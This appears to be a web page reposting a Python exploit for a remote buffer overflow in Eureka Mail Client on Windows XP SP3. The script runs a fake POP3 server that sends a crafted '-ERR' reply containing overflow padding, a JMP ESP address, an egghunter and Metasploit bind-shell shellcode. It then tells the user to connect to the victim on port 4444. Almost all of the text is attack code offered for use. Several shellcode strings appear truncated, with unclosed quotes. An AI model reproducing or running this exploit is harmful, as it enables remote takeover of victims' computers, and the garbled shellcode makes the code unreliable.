11.39.04 Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition | |
#!/usr/bin/env python ############################## # # Eureka Mail Client Remote Buffer Overflow Exploit XP SP3 English Egghunter Edition # Coded By: k4mr4n_st@yahoo.com # Found By: k4mr4n (Securitylab.ir Member) # Tested On: Windows XPSP3 English # Note: This script sets up a fake SMTP server # Note: Set the client to this address and check your mail # ############################## import sys, socket # egghunter (32 bytes) egghunter = ("\x66\x81\xCA\xFF\x0F\x42\ "\x77\x30\x30\x74" # this is the egg: w00t "\x8B\xFA\xAF\x75\xEA\xAF\x75\ # windows/shell_bind_tcp - 368 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=thread, LPORT=4444 bindshell = ("\xbb\xd3\x82\x28\x36\xd9\ "\x56\x83\xee\xfc\x31\x5e\x0f\ "\x1e\x33\xca\x8e\x97\xd6\xfb\ "\xda\xca\xe2\xd2\xae\xc2\x05\ "\xa6\xaa\x85\xf5\xfa\x0c\xb7\ "\x27\xad\xb0\xde\x7a\x6d\xb0\ "\x37\x17\x11\xfe\x7f\x8f\x1a\ "\x08\x56\xf8\xac\x40\x97\xca\ "\xfd\x24\x04\x36\x80\x3e\xdf\ "\x11\xfa\xeb\xac\x1d\xb7\x78\ "\x47\xb7\x97\x77\x43\x93\x4c\ "\x82\x4e\xc4\xc9\xb5\x0c\x81\ "\xf7\x37\x4a\xc8\x70\x9e\x8d\ "\x15\x07\xc7\x23\xbc\x27\x8c\ "\x54\x4e\x1c\x8c\xbe\x41\x43\ "\x9d\x72\x0f\x46\x01\xfa\xe9\ "\x5d\x73\xfb\xd6\xf6\xe3\xb3\ "\xf0\xf7\xaa\x28\xe0\x08\xe7\ "\xe3\x0f\x62\xb0\x76\xd4\x72\ "\x04\xc7\x34\xd1\xd4\x91\x7f\ "\x4a\x1e\xde\xe1\x3e\xce\x89\ "\xd8\x02\xf2\x13\xdb\x54\xfb\ "\xb0\xfc\xb0\x99\x20\x02\x6b\ "\xda\x74\x3f\x87\x19\x81\xbc\ "\xb5\x95\x2c\x0f\xb9\x0a\x4c\ buff = ("\x41" * 710); retn = ("\x53\x93\x42\x7e"); #JMP ESP USER32.DLL XPSP3 nops = ("\x90" * 218); junk = ("\xcc" * 2000); sploit = ("-ERR " + buff + retn + egghunter + nops + junk + "w00tw00t" + bindshell); print (""" ############################## # # Eureka Mail Client Remote Buffer Overflow Exploit (XPSP3) # Coded By: k4mr4n_st@yahoo.com # Found By: k4mr4n (Securitylab.ir Member) # Tested On: Windows XPSP3 # Note: This script sets up a fake SMTP server # Note: Point the client to this address and check your mail # ############################## """) try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(('', 110)) s.listen(1) print ("[*] Listening on port 110.") print ("[*] Have someone connect to you.") print ("[*] Type <control>-c to exit.") conn, addr = s.accept() print '[*] Received connection from: ', addr while 1: conn.send(sploit) conn.close() except: print ("[*] Done. Wait a bit for the egghunter then connect to the victim on port 4444") | |
|
Total comments: 0 | |